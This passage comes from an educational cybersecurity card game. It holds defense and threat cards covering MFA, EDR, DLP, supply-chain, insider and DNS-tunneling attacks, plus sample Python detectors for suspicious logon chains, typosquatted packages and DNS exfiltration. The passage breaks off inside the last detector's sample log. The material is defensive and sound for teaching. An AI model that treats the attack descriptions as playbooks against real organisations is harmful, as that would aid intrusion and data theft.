┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BACKUP & DISASTER RECOVERY          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement the 3-2-1 backup          │
│ strategy: 3 copies of data, 2       │
│ different storage types, 1 offsite  │
│ copy. Test restore procedures       │
│ quarterly.                          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables rapid recovery from         │
│ ransomware. Ensures data            │
│ availability even if primary        │
│ systems are compromised. Critical   │
│ for business continuity.            │
└─────────────────────────────────────┘

Card D-23: IR Program & Runbooks

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ IR PROGRAM & RUNBOOKS               │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish an incident response      │
│ program with detailed runbooks for  │
│ common scenarios: malware infection,│
│ data exfiltration, ransomware,      │
│ insider threats, supply chain       │
│ compromise. Include roles,          │
│ responsibilities, and communication │
│ plans.                              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables faster, more coordinated    │
│ response when incidents occur.      │
│ Reduces confusion during high-      │
│ pressure situations. Improves       │
│ incident containment and recovery   │
│ time.                               │
└─────────────────────────────────────┘

ADVANCED DEFENSES (15 Budget Each)

Card D-07: Multi-Factor Authentication (MFA)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MULTI-FACTOR AUTHENTICATION (MFA)   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy MFA for all remote access    │
│ (VPN, RDP), email, and admin        │
│ portals. Use authenticator apps or  │
│ hardware tokens (not SMS). Enforce  │
│ MFA on sensitive user accounts.     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes compromised credentials       │
│ useless without the second factor.  │
│ Blocks credential stuffing attacks. │
│ Most effective single security      │
│ measure against account takeover.   │
└─────────────────────────────────────┘

Card D-08: EDR (Endpoint Detection & Response)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ EDR (ENDPOINT DETECTION & RESPONSE) │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy EDR agent on all endpoints.  │
│ Monitor process execution, file     │
│ creation, registry modifications,   │
│ and memory injection attempts.      │
│ Enable behavioral analytics and     │
│ automated response.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects living-off-the-land attacks │
│ (PowerShell, cmd, scheduled tasks). │
│ Enables fast incident response and  │
│ threat hunting. Provides deep       │
│ visibility into attack progression. │
└─────────────────────────────────────┘

Card D-09: Network Segmentation

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ NETWORK SEGMENTATION                │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement VLANs and                 │
│ microsegmentation to separate user  │
│ workstations from servers. Deploy   │
│ firewall rules between segments.    │
│ Implement zero-trust network access │
│ controls.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents lateral movement via SMB   │
│ and other internal protocols.       │
│ Limits blast radius of compromise.  │
│ Forces attackers to find alternate  │
│ paths. Combined with MFA, highly    │
│ effective.                          │
└─────────────────────────────────────┘

Card D-10: SIEM Correlation Rules

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ SIEM CORRELATION RULES              │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Create SIEM rules to detect attack  │
│ patterns: failed login spikes,      │
│ privilege escalation attempts,      │
│ unusual process creation, scheduled │
│ task creation, and data exfil       │
│ indicators.                         │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Correlates events across logs to    │
│ detect multi-step attacks. Reduces  │
│ alert fatigue through smart         │
│ aggregation. Enables faster         │
│ investigation and response.         │
└─────────────────────────────────────┘
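
As an added illustration of the correlation this card describes (example code written for this edition, not part of the game's files): one rule that chains a failed-logon spike, a subsequent successful logon from the same source, and a scheduled-task creation on the same host. The events are constructed; 4625, 4624 and 4698 are the real Windows Security event IDs for failed logon, successful logon and scheduled task created.

```python
"""Added example, not from the Incident Zero game files: one multi-step
SIEM correlation rule of the kind Card D-10 describes. Events below are
constructed; 4625/4624/4698 are the real Windows Security event IDs for
failed logon, successful logon and scheduled task created."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, host, event_id, user, source_ip)
SAMPLE_EVENTS = [
    ("2024-03-01T09:00:00", "FS01", 4625, "jdoe", "10.0.5.23"),
    ("2024-03-01T09:00:05", "FS01", 4625, "jdoe", "10.0.5.23"),
    ("2024-03-01T09:00:10", "FS01", 4625, "jdoe", "10.0.5.23"),
    ("2024-03-01T09:00:15", "FS01", 4625, "jdoe", "10.0.5.23"),
    ("2024-03-01T09:00:20", "FS01", 4625, "jdoe", "10.0.5.23"),
    ("2024-03-01T09:00:31", "FS01", 4624, "jdoe", "10.0.5.23"),
    ("2024-03-01T09:04:02", "FS01", 4698, "jdoe", "10.0.5.23"),
    # Benign noise: one mistyped password, then success, no persistence
    ("2024-03-01T09:10:00", "WS07", 4625, "asmith", "10.0.9.4"),
    ("2024-03-01T09:10:09", "WS07", 4624, "asmith", "10.0.9.4"),
]


def correlate(events, fail_threshold=5, fail_window=timedelta(minutes=2),
              followup_window=timedelta(minutes=10)):
    """Alert when, on one host, a source IP produces >= fail_threshold
    failed logons inside fail_window, the same user/source then logs on
    successfully, and a scheduled task is created within followup_window.
    Each stage alone is noise; the chain is the signal."""
    ordered = sorted(events, key=lambda e: e[0])   # ISO timestamps sort
    recent_failures = defaultdict(list)   # (host, src) -> failure times
    spikes = set()                        # (host, user, src) that spiked
    logons = {}                           # (host, user) -> success time
    alerts = []
    for ts, host, event_id, user, src in ordered:
        t = datetime.fromisoformat(ts)
        if event_id == 4625:
            window = recent_failures[(host, src)]
            window.append(t)
            window[:] = [x for x in window if t - x <= fail_window]
            if len(window) >= fail_threshold:
                spikes.add((host, user, src))
        elif event_id == 4624 and (host, user, src) in spikes:
            logons[(host, user)] = t
        elif event_id == 4698 and (host, user) in logons:
            if t - logons[(host, user)] <= followup_window:
                alerts.append({"host": host, "user": user, "source": src,
                               "rule": "logon-spike->success->schtask",
                               "time": ts})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```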

Card D-11: Data Loss Prevention (DLP)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DATA LOSS PREVENTION (DLP)          │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy DLP to monitor outbound data │
│ transfers. Classify sensitive data  │
│ (customer PII, source code, trade   │
│ secrets). Block or alert on         │
│ unauthorized transfers to cloud     │
│ storage, email, USB, or external    │
│ networks.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents SQL database exfiltration  │
│ and bulk data theft. Detects        │
│ unusual data access patterns.       │
│ Enforces data security policies.    │
│ Works best with strong              │
│ authentication and encryption.      │
└─────────────────────────────────────┘

Card D-12: Password Manager & Vault

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PASSWORD MANAGER & VAULT            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy enterprise password vault    │
│ (CyberArk, HashiCorp Vault). Enforce│
│ strong unique passwords. Implement  │
│ password rotation policies for      │
│ service accounts. Enable audit      │
│ logging for credential access.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents credential reuse attacks.  │
│ Makes credential stuffing difficult.│
│ Provides audit trail for compliance │
│ and incident investigation.         │
└─────────────────────────────────────┘

Card D-18: Intrusion Prevention System (IPS)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ INTRUSION PREVENTION SYSTEM (IPS)   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy network-based IPS with       │
│ exploit signatures. Monitor for     │
│ known CVE exploitation patterns.    │
│ Configure WAF (Web Application      │
│ Firewall) rules for SQL injection,  │
│ XSS, and other OWASP Top 10 attacks.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Blocks exploitation attempts in     │
│ transit. Prevents watering hole and │
│ web exploit attacks. Most effective │
│ when combined with patching.        │
└─────────────────────────────────────┘

Card D-24: Threat Intelligence Integration

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ THREAT INTELLIGENCE INTEGRATION     │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasures: NETWORK,           │
│                  DATA EXFIL         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Subscribe to threat intelligence    │
│ feeds (MISP, VirusTotal, AlienVault │
│ OTX). Integrate IOCs (Indicators of │
│ Compromise) into firewall, SIEM,    │
│ and proxy. Participate in           │
│ information sharing communities.    │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables faster detection of known   │
│ malicious IPs and domains.          │
│ Identifies emerging threats         │
│ targeting your industry. Reduces    │
│ detection time from days to minutes.│
└─────────────────────────────────────┘

ELITE DEFENSES (25 Budget Each)

Card D-13: Threat Hunting Program

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ THREAT HUNTING PROGRAM              │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish proactive threat hunting  │
│ using MITRE ATT&CK framework.       │
│ Hunt for living-off-the-land        │
│ techniques, anomalous processes,    │
│ suspicious registry changes, and    │
│ memory injection. Use automated     │
│ tools (OSQuery, Velociraptor).      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Finds advanced attacks that bypass  │
│ signature-based detection. Detects  │
│ LSASS dumping, scheduled task       │
│ persistence, and registry backdoors.│
│ Reduces dwell time significantly.   │
└─────────────────────────────────────┘

Card D-14: Memory Forensics

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MEMORY FORENSICS                    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy memory capture and analysis  │
│ (Volatility, Memoryze). Create      │
│ memory images of suspicious systems.│
│ Analyze for credential dumping,     │
│ injected code, and rootkits. Extract│
│ evidence for incident response.     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects Mimikatz attacks and        │
│ credential harvesting. Reveals      │
│ attacker activities hidden from     │
│ disk forensics. Critical for        │
│ identifying advanced persistence    │
│ mechanisms.                         │
└─────────────────────────────────────┘

Card D-15: Deception Technology (Honeypots)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DECEPTION TECHNOLOGY (HONEYPOTS)    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy decoy systems (fake file     │
│ servers, databases, credentials)    │
│ to detect lateral movement. Create  │
│ canary tokens that alert when       │
│ accessed. Deploy honeypots for web  │
│ exploit detection.                  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Any access to honeypots indicates   │
│ active compromise. Detects lateral  │
│ movement with zero false positives. │
│ Slows attacker progress and forces  │
│ reconnaissance, increasing detection│
│ time.                               │
└─────────────────────────────────────┘

Card D-16: Credential Guard & Secure Boot

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CREDENTIAL GUARD & SECURE BOOT      │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Enable Windows Credential Guard to  │
│ isolate LSASS in virtualized        │
│ container. Implement UEFI Secure    │
│ Boot to prevent bootkit attacks.    │
│ Enable TPM attestation for device   │
│ integrity validation.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes Mimikatz credential dumping   │
│ ineffective. Prevents bootloader    │
│ manipulation. Ensures firmware      │
│ integrity. Blocks entire classes of │
│ attacks targeting early boot stage. │
└─────────────────────────────────────┘

Card D-17: Advanced Malware Sandbox

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ADVANCED MALWARE SANDBOX            │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy advanced sandboxing solution │
│ (Cuckoo, Detonate, hybrid-analysis).│
│ Analyze suspicious files/URLs in    │
│ isolated environments. Generate     │
│ behavioral indicators and YARA      │
│ rules. Share IOCs with threat intel.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects zero-day malware and unknown│
│ exploits. Analyzes evasion tactics. │
│ Generates detection rules for SIEM. │
│ Prevents spread of novel malware.   │
└─────────────────────────────────────┘

Card D-20: Zero Trust Access Control

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ZERO TRUST ACCESS CONTROL           │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement zero-trust architecture:  │
│ verify every access request         │
│ regardless of source. Deploy device │
│ identity, user identity, and        │
│ behavior analytics. Implement       │
│ conditional access policies.        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Eliminates implicit trust based on  │
│ network location. Even compromised  │
│ devices cannot access sensitive     │
│ resources without proper            │
│ authentication and behavior         │
│ validation.                         │
└─────────────────────────────────────┘

Card D-21: Container Security & Orchestration

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER SECURITY & ORCHESTRATION  │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy container runtime security   │
│ (Falco, Sysdig). Implement image    │
│ scanning for vulnerabilities. Use   │
│ policy enforcement engines (OPA/    │
│ Gatekeeper). Implement network      │
│ policies for container              │
│ segmentation.                       │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects container escape attempts.  │
│ Prevents vulnerable images from     │
│ running. Limits lateral movement    │
│ within containerized environments.  │
│ Critical for modern cloud           │
│ applications.                       │
└─────────────────────────────────────┘

Card D-22: Security Information & Event Management (SIEM)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ SECURITY INFO & EVENT MGMT (SIEM)   │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy enterprise SIEM (Splunk,     │
│ ELK, QRadar). Centralize logs from  │
│ all sources. Implement automated    │
│ correlation rules, threat           │
│ intelligence integration, and       │
│ incident response workflows.        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Provides centralized visibility     │
│ into all security events. Enables   │
│ rapid threat detection and          │
│ investigation. Foundation for a     │
│ mature incident response program.   │
└─────────────────────────────────────┘

Sample Printable Card Layouts

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Cut along dotted lines
  3. Optional: Laminate or use sleeves for durability
  4. For color printing: Use the color-coded vectors (red for MALWARE, blue for CREDENTIAL ABUSE, etc.)

Recommended Colors for Vectors


Card Deck Summary

Threat Cards (12 Total)

Defense Cards (24 Total)

Distribution by Countermeasure (v2.2):

  - SOCIAL ENGINEERING: 2 defenses (D-01, D-02)
  - WEB EXPLOIT: 2 defenses (D-03, D-18)
  - CREDENTIAL ABUSE: 4 defenses (D-07, D-12, D-16, D-20)
  - MALWARE: 8 defenses (D-05, D-06, D-08, D-13, D-14, D-17, D-19, D-21)
  - NETWORK: 7 defenses (D-04, D-09, D-10, D-15, D-22, D-23, D-24)
  - DATA EXFIL: 2 defenses (D-11, D-24)

Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA EXFIL) and appears in both rows, so the vector rows sum to 25 tags across 24 cards.


Suggested Play Scenarios

Scenario 1: Startup Security Breach (3-card chain - Beginner)

  1. Phishing Campaign → Deploy Email Authentication or User Training
  2. Mimikatz Credential Dumping → Deploy MFA or Credential Guard
  3. Data Exfiltration via Browser Extension → Deploy DLP or Threat Hunting

Scenario 2: SMB Lateral Movement (4-card chain - Intermediate)

  1. Compromised Credentials → Deploy MFA
  2. Lateral Movement via SMB → Deploy Network Segmentation
  3. Privilege Escalation → Deploy EDR or Threat Hunting
  4. Beaconing to C2 → Deploy Firewall Rules or IPS

Scenario 3: Advanced Ransomware Campaign (5-card chain - Expert)

  1. Watering Hole Attack → Deploy Patching or IPS
  2. Privilege Escalation via Kernel Exploit → Deploy EDR
  3. Scheduled Task Persistence → Deploy Memory Forensics
  4. Mimikatz Credential Dumping → Deploy Credential Guard
  5. Ransomware Deployment → Deploy DLP and Deception Technology

Expansion Decks

The ideas below have been built out as printable expansion cards:

Expansion Threat Cards (T-13 to T-20)

Supply chain attacks, insider threats, IoT device compromise, cloud API abuse, DNS tunneling, and physical security bypass — see ../expansion-deck/advanced-threats.md.

Expansion Defense Cards (D-25 to D-43)

Application whitelisting, behavioral analytics, container security, cloud security posture management, response playbooks, and backup/DR variants — see ../expansion-deck/advanced-defenses.md.


Sample card sheets for the Incident Zero board game. For complete game rules, see docs/rules/core-rules.md and docs/rules/module-incident-response.md.

cards/incident-response/expansion-deck/advanced-threats.md

Incident Zero: Expansion Threat Cards

Advanced Attack Scenarios & Additional Threats

This document provides additional Threat Cards for expanding Incident Zero gameplay beyond the base 12-card deck. These cards introduce more sophisticated attack vectors and modern threat landscape scenarios.


ADDITIONAL THREAT CARDS (8 Cards)

Supply Chain Attack Threats

Card T-13: Compromised Software Vendor Update

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED SOFTWARE VENDOR UPDATE  │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your monitoring systems detect     │
│ unusual outbound connections from   │
│ a recently deployed software update │
│ to an IP address not associated     │
│ with the vendor. The update was     │
│ digitally signed but verification   │
│ shows the signature was backdated.  │
│ Hundreds of organizations received  │
│ the same malicious update."         │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Supply chain compromises affect     │
│ entire industries simultaneously.   │
│ Organizations trust vendor updates  │
│ and often deploy them automatically │
│ without deep inspection. The        │
│ attacker gains access to thousands  │
│ of targets at once. Real-world      │
│ example: SolarWinds, 3CX.           │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ The malware appears legitimate due  │
│ to trusted vendor origin.           │
└─────────────────────────────────────┘

Card T-14: Malicious Third-Party Library Injection

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MALICIOUS THIRD-PARTY LIBRARY       │
│ INJECTION                           │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your dependency scanning tool      │
│ alerts on a typosquatted npm        │
│ package that was installed in your  │
│ build pipeline. The malicious       │
│ package has the same name as a      │
│ popular logging library but with a  │
│ slight misspelling. It has been     │
│ downloaded 50k times. Your build    │
│ logs show it was installed 6 days   │
│ ago."                               │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Developers rely on open-source      │
│ packages from package managers      │
│ (npm, PyPI, Maven). Attackers       │
│ upload malicious packages with      │
│ names similar to popular libraries  │
│ (typosquatting). Once downloaded,   │
│ the malicious code runs during      │
│ build/deployment. This affects      │
│ every application built from that   │
│ point forward.                      │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires dependency scanning and    │
│ behavior analysis of build          │
│ processes.                          │
└─────────────────────────────────────┘
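
An added example of the dependency check this card says is needed (written for this edition, not code from the game's files): installed package names are compared by edit distance against a short allowlist of well-known names, so a near-miss spelling of a popular library stands out. The allowlist and the installed list are constructed; the two misspelled entries are invented and are not claims about real packages.

```python
"""Added example, not from the Incident Zero game files: the dependency
name check Card T-14 calls for. The 'well-known' names and the installed
list are constructed for the example; the two misspelled entries are
invented and are not claims about real packages."""

# Constructed allowlist of well-known logging package names
WELL_KNOWN = {"winston", "pino", "bunyan", "morgan", "loglevel", "debug"}

# Constructed snippet of what a build installed
INSTALLED = ["express", "winston", "wintson", "pino", "morgann", "debug"]


def levenshtein(a: str, b: str) -> int:
    """Edit distance with insert, delete and substitute at cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def suspicious_packages(installed, well_known=WELL_KNOWN, max_distance=2):
    """Return (name, closest_well_known, distance) for installed names that
    are not well-known themselves but are within max_distance edits of one.
    An exact well-known name is the genuine package and is skipped."""
    findings = []
    for name in installed:
        if name in well_known:
            continue
        # sorted() keeps tie-breaking deterministic across runs
        closest = min(sorted(well_known), key=lambda w: levenshtein(name, w))
        distance = levenshtein(name, closest)
        if distance <= max_distance:
            findings.append((name, closest, distance))
    return findings


if __name__ == "__main__":
    for name, target, d in suspicious_packages(INSTALLED):
        print(f"{name!r} is {d} edit(s) from well-known {target!r}")
```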

Insider Threat Cards

Card T-15: Malicious Insider Data Theft

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MALICIOUS INSIDER DATA THEFT        │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your DLP system flags a large      │
│ volume of sensitive data being      │
│ copied by an IT operations          │
│ employee during off-hours. Their    │
│ user account accessed databases     │
│ they don't normally interact with.  │
│ The data was copied to a removable  │
│ USB drive connected to a shared     │
│ workstation. Security badge logs    │
│ show they entered the building at   │
│ 2 AM when the office was empty."    │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Insiders have legitimate access and │
│ often bypass security controls.     │
│ Their activities may not trigger    │
│ alerts because their permissions    │
│ are valid. Detection requires:      │
│ - Behavioral analysis (unusual      │
│  times/volumes)                     │
│ - Physical security controls        │
│ - DLP and USB device control        │
│ - Privileged access management      │
│ Insiders cause 30-40% of data       │
│ breaches in many industries.        │
│                                     │
│ DETECTION DIFFICULTY: Very High     │
│ Insider actions often look normal   │
│ to automated systems.               │
└─────────────────────────────────────┘

Card T-16: Disgruntled Employee Sabotage

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ DISGRUNTLED EMPLOYEE SABOTAGE       │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "A recently terminated database     │
│ administrator appears to have       │
│ retained remote access using a      │
│ dormant service account they        │
│ created months ago. Logs show       │
│ connection attempts from their      │
│ home IP address. They've been       │
│ modifying stored procedures and     │
│ adding logic bombs set to trigger   │
│ in 30 days. Your team notices       │
│ their employee laptop is still      │
│ configured with VPN certificates."  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Disgruntled employees often have    │
│ privileged access and deep system   │
│ knowledge. They may have created    │
│ backdoors before termination.       │
│ Offboarding failures (not revoking  │
│ certs, not disabling accounts) are  │
│ common. Defense requires:           │
│ - Complete offboarding procedures   │
│ - Privileged access review          │
│ - Anomalous activity detection      │
│ - Behavior analysis for terminated  │
│  employees                          │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires correlation of access      │
│ patterns and employee status        │
│ changes.                            │
└─────────────────────────────────────┘

IoT Device Compromise

Card T-17: Compromised IoT Device as Pivot Point

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED IOT DEVICE AS PIVOT     │
│ POINT                               │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your network monitoring detects    │
│ unusual traffic from an IoT device  │
│ (surveillance camera) in the        │
│ building. The device is             │
│ communicating with a command server │
│ overseas and tunneling internal     │
│ network traffic.                    │
│ Your asset inventory shows this     │
│ camera was never formally added to  │
│ any security program. It's running  │
│ firmware from 2019 with known       │
│ vulnerabilities."                   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ IoT devices are often neglected in  │
│ security programs (cameras,         │
│ printers, thermostats, building     │
│ automation).                        │
│ They run outdated firmware and have │
│ weak or default credentials. Once   │
│ compromised, they provide network   │
│ access and can pivot to critical    │
│ systems. Many organizations don't   │
│ inventory or monitor IoT devices.   │
│                                     │
│ DETECTION DIFFICULTY: Medium        │
│ Requires network monitoring and     │
│ device inventory practices.         │
└─────────────────────────────────────┘

Cloud API Abuse

Card T-18: Cloud API Token Theft & Abuse

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ CLOUD API TOKEN THEFT & ABUSE       │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your AWS CloudTrail logs show API  │
│ calls from unusual IP addresses     │
│ using API keys belonging to a       │
│ developer who left the company 6    │
│ months ago. The calls are creating  │
│ new IAM users, accessing S3 buckets │
│ with customer data, and launching   │
│ EC2 instances in regions where you  │
│ don't normally operate. The API key │
│ was embedded in old GitHub          │
│ repository code."                   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Cloud API tokens/keys are often     │
│ exposed in code repositories or     │
│ configuration files. Once exposed,  │
│ they provide direct access to cloud │
│ resources. Attackers can spin up    │
│ resources, steal data, or deploy    │
│ cryptominers. Many organizations    │
│ fail to rotate or revoke old API    │
│ keys. Detection requires:           │
│ - API audit logging                 │
│ - Anomalous API pattern detection   │
│ - Key rotation policies             │
│ - Secrets scanning in repos         │
│                                     │
│ DETECTION DIFFICULTY: Medium-High   │
│ Requires cloud monitoring and       │
│ secrets management practices.       │
└─────────────────────────────────────┘

DNS Tunneling for Data Exfiltration

Card T-19: DNS Tunneling Data Exfiltration

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ DNS TUNNELING DATA EXFILTRATION     │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your DNS query logs show a massive │
│ volume of unusual subdomains being  │
│ queried through an external DNS     │
│ resolver. The subdomain names look  │
│ like Base64-encoded data. Queries   │
│ are happening at steady intervals.  │
│ Query timestamps align with your    │
│ database being accessed. Your DLP   │
│ didn't flag anything because DNS is │
│ typically trusted."                 │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ DNS tunneling encodes data in DNS   │
│ queries to bypass firewalls and DLP │
│ systems. Organizations often allow  │
│ DNS traffic without inspection. DNS │
│ queries are typically high-volume   │
│ and hard to distinguish from normal │
│ activity. Attackers can exfil small │
│ amounts of data over weeks.         │
│ Defense requires:                   │
│ - DNS query content analysis        │
│ - Anomalous query pattern detection │
│ - DNS rate limiting                 │
│ - External DNS access restrictions  │
│                                     │
│ DETECTION DIFFICULTY: Very High     │
│ Requires specialized DNS monitoring │
│ tools and baseline analysis.        │
└─────────────────────────────────────┘
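
The content and pattern checks this card lists, as an added example run over constructed resolver log lines (written for this edition, not code from the game's files): per base domain it counts distinct subdomain labels, measures their length and Shannon entropy, and reports how regular the inter-query gaps are. The log format, client addresses and domains are made up for the example, and treating the last two labels as the registrable domain is a simplification.

```python
"""Added example, not from the Incident Zero game files: the content and
pattern checks Card T-19 lists, run over constructed resolver log lines.
The log format, client addresses and domains are made up for the example."""
import math
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log lines: "<ISO time> <client> <queried name>"
SAMPLE_LOG = """\
2024-03-01T10:00:00 10.0.8.15 www.example.com
2024-03-01T10:00:01 10.0.8.15 mail.example.com
2024-03-01T10:00:02 10.0.8.15 cdn.example.com
2024-03-01T10:00:03 10.0.8.15 www.example.com
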